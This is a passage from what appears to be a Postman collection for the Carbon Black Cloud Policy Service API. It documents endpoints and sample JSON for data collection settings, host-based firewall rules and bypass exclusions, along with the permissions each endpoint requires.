authentication events at the sensor\",\n            \"inherited_from\": \"\",\n            \"category\": \"data_collection\",\n            \"parameters\": {\n                \"enable_auth_events\": false\n            }\n        },\n        {\n            \"id\": \"d67f36ca-97c2-11ed-a8fc-0242ac120002\",\n            \"name\": \"Enterprise EDR Event Collection\",\n            \"description\": \"Enterprise EDR Event Collection\",\n            \"inherited_from\": \"psc:region\",\n            \"category\": \"data_collection\",\n            \"parameters\": {\n                \"ubs_opt_in\": false\n            }\n        },\n        {\n            \"id\": \"491dd777-5a76-4f58-88bf-d29926d12778\",\n            \"name\": \"Prevalent Module Exclusions\",\n            \"description\": \"Collects events created when a process loads a common library. Enabling this will increase the number of events reported for expected process behavior.\",\n            \"inherited_from\": \"psc:region\",\n            \"category\": \"data_collection\",\n            \"parameters\": {\n                \"enable_prevalent_module_event_collection\": false\n            }\n        },\n        {\n            \"id\": \"cc075469-8d1e-4056-84b6-0e6f437c4010\",\n            \"name\": \"XDR\",\n            \"description\": \"Turns on XDR network data collection at the sensor\",\n            \"inherited_from\": \"\",\n            \"category\": \"data_collection\",\n            \"parameters\": {\n                \"enable_network_data_collection\": true\n            }\n        }\n    ]\n}"}],"_postman_id":"61bab68d-f0a9-4c71-89bc-8b2be8a7f110"},{"name":"Update Data Collection Rule Configs","id":"22496d17-9e77-45e4-9c2b-82b108439b7b","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[],"body":{"mode":"raw","raw":"[\n    {\n        \"id\": \"{{cb_rule_config_id}}\",\n        \"category\": \"data_collection\",\n        \"parameters\": {\n            \"enable_auth_events\": true\n        }\n    }\n]","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/policyservice/v1/orgs/{{cb_org_key}}/policies/{{cb_policy_id}}/rule_configs/data_collection","description":"<p>Update parameters for data collection rule configs.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.policies</td>\n<td>UPDATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/policy-service/\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["policyservice","v1","orgs","{{cb_org_key}}","policies","{{cb_policy_id}}","rule_configs","data_collection"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"22496d17-9e77-45e4-9c2b-82b108439b7b"},{"name":"Delete Data Collection Rule Configs","id":"db1bd050-1d19-4f1a-a23c-c85f40b00b71","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[],"url":"{{cb_url}}/policyservice/v1/orgs/{{cb_org_key}}/policies/{{cb_policy_id}}/rule_configs/data_collection","description":"<p>Reset all data collection rule configs to default values.</p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["policyservice","v1","orgs","{{cb_org_key}}","policies","{{cb_policy_id}}","rule_configs","data_collection"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"db1bd050-1d19-4f1a-a23c-c85f40b00b71"},{"name":"Delete Specific Data Collection Rule Config","id":"efaa53ca-b230-4951-8b66-cf876b4870ee","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[],"url":"{{cb_url}}/policyservice/v1/orgs/{{cb_org_key}}/policies/{{cb_policy_id}}/rule_configs/data_collection/{{cb_rule_config_id}}","description":"<p>Reset a specific data collection rule config the default setting.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.policies</td>\n<td>DELETE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/policy-service/\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["policyservice","v1","orgs","{{cb_org_key}}","policies","{{cb_policy_id}}","rule_configs","data_collection","{{cb_rule_config_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"efaa53ca-b230-4951-8b66-cf876b4870ee"}],"id":"9b5629d0-d0fd-4df0-a1ae-517f57588ec0","description":"<p>The Data Collection section of the Policy Service API is used to turn collection of specific types of data on and off.</p>\n<p>The first data collection to use policies to enable and disable collection is Auth Events, released in March 2023 as part of the XDR feature.</p>\n<p>More information about Auth Events is available on</p>\n<ul>\n<li><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/auth-events-api\">Developer Network Auth Events API</a></li>\n</ul>\n<p>More information about the Policy Service API is <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/policy-service/\">here</a>.</p>\n","_postman_id":"9b5629d0-d0fd-4df0-a1ae-517f57588ec0","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Rule Config - Host-Based Firewall","item":[{"name":"Get Host-Based Firewall Rule Configs","id":"640d462a-cdd4-40fd-9b17-9dba15d1a185","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/policyservice/v1/orgs/{{cb_org_key}}/policies/{{cb_policy_id}}/rule_configs/host_based_firewall","description":"<p>Fetch host-based firewall rule configs for the specified policy.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.policies</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/policy-service/\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["policyservice","v1","orgs","{{cb_org_key}}","policies","{{cb_policy_id}}","rule_configs","host_based_firewall"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"34c12409-1120-41ff-b09c-c2b92e7b2d54","name":"Get Host-Based Rule Configs","originalRequest":{"method":"GET","header":[],"url":"{{cb_url}}/policyservice/v1/orgs/{{cb_org_key}}/policies/{{cb_policy_id}}/rule_configs/host_based_firewall"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n  \"results\": [\n    {\n      \"id\": \"df181779-f623-415d-879e-91c40246535d\",\n      \"name\": \"Host-Based Firewall\",\n      \"description\": \"These are the Host-Based Firewall Rules which will be executed by the sensor.\",\n      \"category\": \"host_based_firewall\",\n      \"parameters\": {\n        \"enable_host_based_firewall\": true,\n        \"default_rule\": {\n          \"name\": \"Default Action\",\n          \"description\": \"Block/Allow all traffic\",\n          \"action\": \"ALLOW\"\n        },\n        \"rule_groups\": [\n          {\n            \"name\": \"Block access to dark web\",\n            \"description\": \"Block access to dark web description\",\n            \"rules\": [\n              {\n                \"name\": \"Example Rule\",\n                \"network_profile\": [\n                    \"DOMAIN\"\n                ],\n                \"local_ip_address\": \"192.168.1.1\",\n                \"remote_ip_address\": \"2.2.2.2\",\n                \"remote_port_ranges\": \"443\",\n                \"local_port_ranges\": \"8443\",\n                \"action\": \"BLOCK\",\n                \"direction\": \"OUT\",\n                \"protocol\": \"TCP\",\n                \"test_mode\": false,\n                \"application_path\": \"C:\\\\Program Files\\\\myapp1\",\n                \"enabled\": true\n              }\n            ]\n          }\n        ]\n      }\n    }\n  ]\n}"}],"_postman_id":"640d462a-cdd4-40fd-9b17-9dba15d1a185"},{"name":"Update Host-Based Firewall Rule Configs","id":"6583b268-5e9a-4145-956e-5f6ac939cee3","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[],"body":{"mode":"raw","raw":"[\n    {\n        \"id\": \"<string>\",\n        \"parameters\": {\n            \"enable_host_based_firewall\": <boolean>,\n            \"default_rule\": {\n                \"name\": \"<string>\",\n                \"description\": \"<string>\",\n                \"action\": \"<string>\"\n            },\n            \"rule_groups\": [\n                {\n                    \"name\": \"<string>\",\n                    \"description\": \"<string>\",\n                    \"rules\": [\n                        {\n                            \"local_ip_address\": \"<string>\",\n                            \"remote_ip_address\": \"<string>\",\n                            \"remote_port_ranges\": \"<string>\",\n                            \"local_port_ranges\": \"<string>\",\n                            \"action\": \"<string>\",\n                            \"direction\": \"<string>\",\n                            \"protocol\": \"<string>\",\n                            \"test_mode\": <booleab>,\n                            \"application_path\": \"<string>\",\n                            \"enabled\": <boolean>\n                        }\n                    ]\n                }\n            ]\n        }\n    }\n]","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/policyservice/v1/orgs/{{cb_org_key}}/policies/{{cb_policy_id}}/rule_configs/host_based_firewall","description":"<p>Update parameters for host-based firewall rule configs.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.firewall.rules</td>\n<td>UPDATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/policy-service/\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["policyservice","v1","orgs","{{cb_org_key}}","policies","{{cb_policy_id}}","rule_configs","host_based_firewall"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"2dbb2c70-ea03-4238-8993-aee33265dd83","name":"Update Host-Based Firewall Rule Configs","originalRequest":{"method":"PUT","header":[],"body":{"mode":"raw","raw":"[\n    {\n        \"id\": \"df181779-f623-415d-879e-91c40246535d\",\n        \"parameters\": {\n            \"enable_host_based_firewall\": true,\n            \"default_rule\": {\n                \"name\": \"Default Action\",\n                \"description\": \"Block/Allow all traffic\",\n                \"action\": \"ALLOW\"\n            },\n            \"rule_groups\": [\n                {\n                    \"name\": \"Block access to dark web\",\n                    \"description\": \"Block access to dark web description\",\n                    \"rules\": [\n                        {\n                            \"local_ip_address\": \"192.168.1.1\",\n                            \"remote_ip_address\": \"2.2.2.2\",\n                            \"remote_port_ranges\": \"443\",\n                            \"local_port_ranges\": \"8443\",\n                            \"action\": \"BLOCK\",\n                            \"direction\": \"OUT\",\n                            \"protocol\": \"TCP\",\n                            \"test_mode\": false,\n                            \"application_path\": \"C:\\\\Program Files\\\\myapp1\",\n                            \"enabled\": true\n                        }\n                    ]\n                }\n            ]\n        }\n    }\n]","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/policyservice/v1/orgs/{{cb_org_key}}/policies/{{cb_policy_id}}/rule_configs/host_based_firewall"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"successful\": [\n        {\n            \"id\": \"df181779-f623-415d-879e-91c40246535d\",\n            \"name\": \"Host-Based Firewall\",\n            \"description\": \"These are the Host-Based Firewall Rules which will be executed by the sensor.\",\n            \"category\": \"host_based_firewall\",\n            \"parameters\": {\n                \"enable_host_based_firewall\": true,\n                \"default_rule\": {\n                    \"name\": \"Default Action\",\n                    \"description\": \"Block/Allow all traffic\",\n                    \"action\": \"ALLOW\"\n                },\n                \"rule_groups\": [\n                    {\n                        \"name\": \"Block access to dark web\",\n                        \"description\": \"Block access to dark web description\",\n                        \"rules\": [\n                            {\n                                \"name\": \"Example Rule\",\n                                \"network_profile\": [\n                                    \"DOMAIN\"\n                                ],\n                                \"local_ip_address\": \"192.168.1.1\",\n                                \"remote_ip_address\": \"2.2.2.2\",\n                                \"remote_port_ranges\": \"443\",\n                                \"local_port_ranges\": \"8443\",\n                                \"action\": \"BLOCK\",\n                                \"direction\": \"OUT\",\n                                \"protocol\": \"TCP\",\n                                \"test_mode\": false,\n                                \"application_path\": \"C:\\\\Program Files\\\\myapp1\",\n                                \"enabled\": true\n                            }\n                        ]\n                    }\n                ]\n            }\n        }\n    ],\n    \"failed\": []\n}"}],"_postman_id":"6583b268-5e9a-4145-956e-5f6ac939cee3"},{"name":"Delete Host-Based Firewall Rule Configs","id":"c0607d77-ba83-461e-a457-0645a8df4e9e","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[],"url":"{{cb_url}}/policyservice/v1/orgs/{{cb_org_key}}/policies/{{cb_policy_id}}/rule_configs/host_based_firewall","description":"<p>Delete all host-based firewall rules from the specified policy.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.firewall.rules</td>\n<td>DELETE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/policy-service/\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["policyservice","v1","orgs","{{cb_org_key}}","policies","{{cb_policy_id}}","rule_configs","host_based_firewall"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"c0607d77-ba83-461e-a457-0645a8df4e9e"},{"name":"Delete Specific Host-Based Firewall Rule Config","id":"4dab4d2a-6dc8-4daa-9092-d29a5931fbe7","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[],"url":"{{cb_url}}/policyservice/v1/orgs/{{cb_org_key}}/policies/{{cb_policy_id}}/rule_configs/host_based_firewall/{{cb_rule_config_id}}","description":"<p>Remove a specific host-based firewall rule config.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.firewall.rules</td>\n<td>DELETE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/policy-service/\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["policyservice","v1","orgs","{{cb_org_key}}","policies","{{cb_policy_id}}","rule_configs","host_based_firewall","{{cb_rule_config_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"4dab4d2a-6dc8-4daa-9092-d29a5931fbe7"},{"name":"Copy Host-Based Firewall Rule Config","id":"b7500bc2-0486-4e67-9fd9-efe20f6b6bb5","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"target_policy_ids\": [\n        <integer>\n    ],\n    \"parameters\": {\n        \"rule_groups\": [\n            {\n                \"name\": \"<string>\",\n                \"description\": \"<string>\",\n                \"rules\": [\n                    {\n                        \"local_ip_address\": \"<string>\",\n                        \"remote_ip_address\": \"<string>\",\n                        \"remote_port_ranges\": \"<string>\",\n                        \"local_port_ranges\": \"<string>\",\n                        \"application_path\": \"<string>\",\n                        \"name\": \"Example Rule\",\n                        \"network_profile\": [\n                            \"<string>\"\n                        ],\n                        \"action\": \"<string>\",\n                        \"direction\": \"<string>\",\n                        \"protocol\": \"<string>\",\n                        \"enabled\": <boolean>\n                    }\n                ]\n            }\n        ]\n    }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/policyservice/v1/orgs/{{cb_org_key}}/policies/{{cb_policy_id}}/rule_configs/host_based_firewall/_copy","description":"<p>Copy parameters for host-based firewall rule configs to another policy.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.firewall.rules</td>\n<td>UPDATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/policy-service/\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["policyservice","v1","orgs","{{cb_org_key}}","policies","{{cb_policy_id}}","rule_configs","host_based_firewall","_copy"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"5298b195-9d43-45b8-b6d9-c89bb23569ac","name":"Copy Host-Based Firewall Rule Config","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"target_policy_ids\": [\n        3,\n        5\n    ],\n    \"parameters\": {\n        \"rule_groups\": [\n            {\n                \"name\": \"Block access to darker web\",\n                \"description\": \"Block access to dark web\",\n                \"rules\": [\n                    {\n                        \"local_ip_address\": \"192.168.2.2\",\n                        \"remote_ip_address\": \"22.22.22.22\",\n                        \"remote_port_ranges\": \"443\",\n                        \"local_port_ranges\": \"8443\",\n                        \"application_path\": \"C:\\\\Program Files\\\\myapp6\",\n                        \"action\": \"BLOCK\",\n                        \"direction\": \"OUT\",\n                        \"protocol\": \"TCP\",\n                        \"enabled\": true\n                    }\n                ]\n            }\n        ]\n    }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/policyservice/v1/orgs/{{cb_org_key}}/policies/{{cb_policy_id}}/rule_configs/host_based_firewall/_copy"},"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"failed_policy_ids\": [\n        5\n    ],\n    \"num_applied\": 1,\n    \"message\": \"string\",\n    \"success\": true\n}"}],"_postman_id":"b7500bc2-0486-4e67-9fd9-efe20f6b6bb5"},{"name":"Export Host-Based Firewall Rules","id":"17f15422-80b6-4458-86a5-b7512e036b6d","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/policyservice/v1/orgs/{{cb_org_key}}/policies/{{cb_policy_id}}/rule_configs/host_based_firewall/rules/_export?format=json","description":"<p>Export host-based firewall rule configs.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.policies</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/policy-service/\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["policyservice","v1","orgs","{{cb_org_key}}","policies","{{cb_policy_id}}","rule_configs","host_based_firewall","rules","_export"],"host":["{{cb_url}}"],"query":[{"description":{"content":"<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code>The format to export.  Either \"csv\" or \"json\"\n</code></pre>","type":"text/plain"},"key":"format","value":"json"}],"variable":[]}},"response":[],"_postman_id":"17f15422-80b6-4458-86a5-b7512e036b6d"}],"id":"d2b5fefe-4d38-413b-92ab-a7f94b4ec69b","description":"<p>Carbon Black Cloud delivers a Host-based Firewall solution that addresses the protection of an asset based on rules that govern network and application behavior. These rules take specified actions based on observed behavior. Multiple rules can form a policy, and these policies are applied to assets.</p>\n<p><em><strong>Note:</strong></em> <em>The Carbon Black Cloud Host-based Firewall feature requires the Windows sensor v3.9+</em></p>\n<p>A firewall rule is composed of an action and an object. Available actions are:</p>\n<ul>\n<li><strong>Allow:</strong> Allows the network traffic</li>\n<li><strong>Block:</strong> Blocks the network traffic</li>\n<li><strong>Block and Alert:</strong> Blocks the network traffic and sends an alert to the Alerts page</li>\n</ul>\n<p>Firewall rules are based on evaluation of the following types of objects:</p>\n<ul>\n<li>Local (client computer) and remote (computer that communicates with the client computer)</li>\n<li>IP address and subnet ranges</li>\n<li>Port or port ranges</li>\n<li>Protocol (TCP, UDP, ICMP)</li>\n<li>Direction (inbound and outbound)</li>\n<li>Application, determined by file path</li>\n</ul>\n<p><em><strong>Note:</strong></em> <em>The local host is always the local client computer and the remote host is always a remote computer that is positioned elsewhere on the network. This expression of the host relationship is independent of the direction of traffic.</em></p>\n<p>Existing sensor conditions can impact the enforcement of rules. For example, the sensor can be in bypass mode or quarantine, or applications can be blocked. Carbon Black Cloud Host-based Firewall maintains the intended action of the rule as specified by the user, although the rule can take a different actual action when it is enforced based on the sensor condition. The following table describes these cases.</p>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Sensor Mode</th>\n<th>Intended Action</th>\n<th>Actual Action</th>\n<th>Summary</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>Quarantine</td>\n<td>Allow or Block</td>\n<td>Block except to Carbon Black Cloud</td>\n<td>Quarantine block rules override Host-based Firewall rules.</td>\n</tr>\n<tr>\n<td>Bypass</td>\n<td>Allow or Block</td>\n<td>Allow</td>\n<td>Because the sensor is in bypass mode, the Host-based Firewall rule is ineffective.</td>\n</tr>\n<tr>\n<td>Prevention policy - block</td>\n<td>Allow or Block</td>\n<td>Block</td>\n<td>Blocked connections to and from the application take precedence over Host-based Firewall rules.</td>\n</tr>\n</tbody>\n</table>\n</div>","_postman_id":"d2b5fefe-4d38-413b-92ab-a7f94b4ec69b","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Rule Config - Bypass","item":[{"name":"List Bypass Rule Configs","id":"ee1ef021-f497-4c72-b6c4-057147a47fb8","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/policyservice/v1/orgs/{{cb_org_key}}/policies/{{cb_policy_id}}/rule_configs/bypass","description":"<p>Fetch Bypass Rule Configs</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.policies</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/policy-service/#get-bypass-rule-configs\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["policyservice","v1","orgs","{{cb_org_key}}","policies","{{cb_policy_id}}","rule_configs","bypass"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"fa668e56-6eb6-453c-a368-c89436b97473","name":"List all bypass rule configs for a policy scope","originalRequest":{"method":"GET","header":[],"url":"{{cb_url}}/policyservice/v1/orgs/{{cb_org_key}}/policies/{{cb_policy_id}}/rule_configs/bypass"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Sat, 27 Jan 2024 13:31:36 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"478"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Content-Encoding","value":"br"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Traceid","value":"c8a11607-d288-4be9-b62f-16bc91c43aff"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"results\": [\n        {\n            \"id\": \"1664f2e6-645f-4d6e-98ec-0c80485cbe0f\",\n            \"name\": \"Event Reporting Exclusions\",\n            \"description\": \"Allows customers to exclude specific processes from reporting events to CBC\",\n            \"inherited_from\": \"psc:region\",\n            \"category\": \"bypass\",\n            \"parameters\": {}\n        },\n        {\n            \"id\": \"1c03d653-eca4-4adc-81a1-04b17b6cbffc\",\n            \"name\": \"Event Reporting and Sensor Operation Exclusions\",\n            \"description\": \"Allows customers to exclude specific processes and process events from reporting to CBC\",\n            \"inherited_from\": \"psc:region\",\n            \"category\": \"bypass\",\n            \"parameters\": {},\n            \"exclusions\": {\n                \"windows\": [\n                    {\n                        \"id\": 8090,\n                        \"criteria\": [\n                            {\n                                \"id\": 13426,\n                                \"type\": \"initiator_process\",\n                                \"attributes\": [\n                                    {\n                                        \"id\": 93774,\n                                        \"name\": \"process_name\",\n                                        \"values\": [\n                                            \"**\\\\explorer.exe\"\n                                        ]\n                                    }\n                                ]\n                            },\n                            {\n                                \"id\": 13427,\n                                \"type\": \"operation\",\n                                \"attributes\": [\n                                    {\n                                        \"id\": 93775,\n                                        \"name\": \"operation_type\",\n                                        \"values\": [\n                                            \"ALL\"\n                                        ]\n                                    }\n                                ]\n                            }\n                        ],\n                        \"comments\": \"\",\n                        \"type\": \"ENDPOINT_STANDARD_PROCESS_BYPASS\",\n                        \"apply_to_descendent_processes\": true,\n                        \"created_by\": \"ABCD1234\",\n                        \"created_at\": \"2024-01-27T13:29:44.839Z\",\n                        \"modified_by\": \"ABCD1234\",\n                        \"modified_at\": \"2024-01-27T13:29:44.839Z\"\n                    }\n                ]\n            }\n        }\n    ]\n}"}],"_postman_id":"ee1ef021-f497-4c72-b6c4-057147a47fb8"},{"name":"Update Bypass Rule 